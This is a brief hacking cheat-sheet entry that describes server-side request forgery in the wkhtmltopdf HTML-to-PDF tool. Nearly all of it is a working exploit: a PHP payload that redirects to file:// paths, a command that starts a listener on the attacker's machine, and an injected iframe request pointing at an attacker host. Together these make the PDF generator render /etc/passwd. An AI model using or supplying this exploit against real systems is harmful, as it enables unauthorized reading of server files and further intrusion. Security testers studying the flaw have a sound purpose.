wkhtmltopdf SSRF

Last modified: Sat Apr 08 2023 00:00:00 GMT+0000 (Coordinated Universal Time)

Web

wkhtmltopdf is a command line tool to render HTML into PDF using Qt WebKit. It is vulnerable to SSRF.

Exploitation

Create a PHP payload to read local file.

<?php header('location:file://'.$_REQUEST['x']); ?>

Then start web server in local machine.

php -S 0.0.0.0:8000

Send request to where wkhtmltopdf is affected. For example,

/htmltopdf?item=<iframe src=http://10.0.0.1:8000/test.php?x=/etc/passwd width=1000px height=1000px></iframe>

Now we can see the system users list via a generated PDF.